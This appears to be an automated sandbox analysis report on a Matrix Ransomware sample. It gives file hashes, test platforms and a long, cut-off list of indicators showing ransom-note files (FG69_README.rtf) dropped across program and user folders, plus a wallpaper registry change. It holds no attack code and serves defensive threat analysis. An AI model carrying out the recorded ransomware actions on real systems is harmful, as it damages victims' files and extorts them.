Analysis
-
max time kernel
70s -
max time network
73s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
15-10-2020 17:18
Static task
static1
Behavioral task
behavioral1
Sample
d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe
Resource
win7v200722
Behavioral task
behavioral2
Sample
d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe
Resource
win10v200722
General
-
Target
d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe
-
Size
1.2MB
-
MD5
23556cf826833342ffa859198330773b
-
SHA1
26441944ca43630d4d56e2713e1ef593be31c1cd
-
SHA256
d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829
-
SHA512
e546850f6c493a7a5ba832de0689c06f66d695cb9426604abd394aceb5ea2905d448d39c6708d3f32fc533058d732175b0062a6fb8e65ba5066de632bb7da870
Malware Config
Signatures
-
Matrix Ransomware 454 IoCs
Targeted ransomware with information collection and encryption functionality.
description ioc Process File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\zi\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\2ulz21c5.default-release\OfflineCache\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\MSBuild\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Public\Documents\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\Contacts\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Google\Update\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Public\Recorded TV\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\Videos\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2ulz21c5.default-release\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\0V5SICB9\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\include\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\zi\America\Indiana\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Public\Pictures\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Adobe\Color\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\http\dialogs\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\2ulz21c5.default-release\startupCache\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\plugins\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe Set value (str) \REGISTRY\USER\S-1-5-21-403932158-3302036622-1224131197-1000\Control Panel\Desktop\TileWallpaper = "0" reg.exe File created C:\Users\Public\Downloads\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\Favorites\Links\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Public\Libraries\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\cmm\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\plugins\access\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\modules\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Public\Pictures\Sample Pictures\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Etc\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\_platform_specific\win_x64\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\db\bin\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\db\lib\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Optional\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\http\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\security\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\Saved Games\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\images\cursors\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\zi\America\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\Favorites\Windows Live\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Atlantic\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\ProgramData\Package Cache\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\packages\Patch\x64\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\Searches\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Google\Update\Install\{C2992E49-2AEA-49C3-A145-FACF92F54BB3}\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\skins\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Europe\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Australia\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Mozilla Firefox\uninstall\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\FG69_README.rtf d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe File created 